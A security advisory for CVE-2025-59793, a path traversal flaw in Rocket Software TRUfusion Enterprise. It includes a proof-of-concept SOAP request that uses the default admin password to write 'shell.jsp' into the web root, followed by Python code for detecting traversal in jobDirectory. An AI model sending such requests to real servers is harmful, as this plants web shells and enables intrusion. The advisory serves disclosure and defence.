Rocket Software TRUfusion Enterprise < 7.10.5 WsPortalV6UpDwAxis2Impl Path Traversal Remote Code Execution
Feb 16, 2026 · By Julien Ahrens
ADVISORY INFORMATION
- Product: TRUfusion Enterprise
- Vendor URL: https://www.rocketsoftware.com/en-us/products/b2b-supply-chain-integration/trufusion
- CWE: Path Traversal [CWE-35]
- Date found: 2025-09-25
- Date published: 2026-02-16
- CVSSv4 Score: 9.4 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)
- CVE: CVE-2025-59793
CREDITS
This vulnerability was discovered and researched by Julien Ahrens from RCE Security.
VERSIONS AFFECTED
TRUfusion Enterprise versions < 7.10.5
INTRODUCTION
TRUfusion Enterprise is a simple, cost-effective complementary solution for companies using CAD and PLM systems such as Siemens NX and Teamcenter®, PTC Creo and Windchill™, and Dassault Systemes CATIA, allowing you to easily and securely manage the exchange of CAD files and related product design data from within your PLM system.
(from the vendor’s homepage)
VULNERABILITY DETAILS
TRUfusion Enterprise is vulnerable to an authenticated path traversal in file upload path handling. The issue affects the uploadFile operation exposed by the /axis2/services/WsPortalV6UpDwAxis2Impl service, where the jobDirectory parameter is insufficiently validated and allows traversal outside the intended upload path, resulting in arbitrary file write. This can lead to remote code execution if attacker-controlled files are written to web-accessible or executable locations. Exploitation risk is increased by deployments that retain the default admin password trubiquity. In some affected versions, the vulnerable Axis2 endpoint is bound to localhost, but that restriction can be bypassed by chaining with CVE-2025-32355 to reach internal-only services.
PROOF OF CONCEPT
POST /axis2/services/WsPortalV6UpDwAxis2Impl HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: keep-alive
SOAPAction: urn:uploadFile
Content-Type: text/xml
Content-Length: 1531
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:updw="http://updw.webservice.ddxPortalV6.ddxv6.procaess.com">
<soapenv:Header/>
<soapenv:Body>
<updw:uploadFile>
<!--type: string-->
<updw:login>admin</updw:login>
<!--type: string-->
<updw:password>trubiquity</updw:password>
<!--type: string-->
<updw:archiveName>shell.jsp</updw:archiveName>
<!--type: string-->
<updw:jobNumberSend></updw:jobNumberSend>
<!--type: string-->
<updw:jobDirectory>/../../../../opt/TRUfusion/web/tomcat/webapps/trufusionPortal/jsp/</updw:jobDirectory>
<!--type: base64Binary-->
<updw:dataHandler>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</updw:dataHandler>
</updw:uploadFile>
</soapenv:Body>
</soapenv:Envelope>
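The following Python is an added illustration, not code from the advisory or from the vendor: it models what a naive join of an upload root and the jobDirectory value from the request above produces, and shows the containment check that rejects it. UPLOAD_BASE, make_body and inspect_upload_request are assumptions of this example (the product's real upload directory is not given in the advisory); the same parser can be run over captured SOAP bodies to flag uploadFile calls whose jobDirectory escapes the upload root.

```python
import posixpath
import xml.etree.ElementTree as ET

# Namespaces copied from the proof-of-concept request in the advisory.
NS = {"soapenv": "http://schemas.xmlsoap.org/soap/envelope/",
      "updw": "http://updw.webservice.ddxPortalV6.ddxv6.procaess.com"}
# Assumed upload root (placeholder): the product's real base directory is not in the advisory.
UPLOAD_BASE = "/opt/TRUfusion/data/uploads"

def resolve_job_directory(base, job_directory):
    """Model a naive 'base + jobDirectory' join followed by path normalisation."""
    return posixpath.normpath(base.rstrip("/") + "/" + job_directory.lstrip("/"))

def is_within_base(base, resolved):
    """Containment check: the normalised path must be the base itself or sit below it."""
    base = posixpath.normpath(base)
    return resolved == base or resolved.startswith(base + "/")

def inspect_upload_request(body):
    """Parse an uploadFile SOAP body and report where the file write would land."""
    op = ET.fromstring(body).find(".//updw:uploadFile", NS)
    if op is None:
        return None
    job_dir = op.findtext("updw:jobDirectory", default="", namespaces=NS)
    archive = op.findtext("updw:archiveName", default="", namespaces=NS)
    resolved = resolve_job_directory(UPLOAD_BASE, job_dir)
    return {"archiveName": archive,
            "jobDirectory": job_dir,
            "resolved": resolved,
            # True when the write lands outside the upload root: the request must be rejected.
            "escapes_base": not is_within_base(UPLOAD_BASE, resolved),
            # Cheap log-side indicator: a literal '..' path component in jobDirectory.
            "has_dotdot": ".." in job_dir.split("/")}

def make_body(archive, job_dir):
    """Build a constructed uploadFile envelope with the PoC's shape (payload omitted)."""
    return (f'<soapenv:Envelope xmlns:soapenv="{NS["soapenv"]}" xmlns:updw="{NS["updw"]}">'
            "<soapenv:Body><updw:uploadFile>"
            f"<updw:archiveName>{archive}</updw:archiveName>"
            f"<updw:jobDirectory>{job_dir}</updw:jobDirectory>"
            "</updw:uploadFile></soapenv:Body></soapenv:Envelope>")

# Constructed samples: the jobDirectory value from the advisory, and a benign job folder.
TRAVERSAL_BODY = make_body("shell.jsp", "/../../../../opt/TRUfusion/web/tomcat/webapps/trufusionPortal/jsp/")
BENIGN_BODY = make_body("design.zip", "job123/")
```

With the assumed four-level upload root, the traversal value normalises to the JSP directory named in the request, while "job123/" stays inside UPLOAD_BASE.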
SOLUTION
Update to TRUfusion Enterprise 7.10.5
REPORT TIMELINE
- 2025-09-20: Discovery of the vulnerability
- 2025-09-22: CVE-2025-59793 assigned by MITRE
- 2025-09-25: Vendor contacted via established disclosure channel
- 2025-11-12: No vendor response; requested update
- 2025-11-12: Vendor confirmed ongoing investigation
- 2026-01-01: Happy new year!
- 2026-02-09: Vendor notified of upcoming disclosure
- 2026-02-09: Vendor stated that the issue had been resolved
- 2026-02-09: Clarification requested regarding affected and fixed versions
- 2026-02-11: Vendor confirmed fix included in TRUfusion Enterprise 7.10.5
- 2026-02-16: Public Disclosure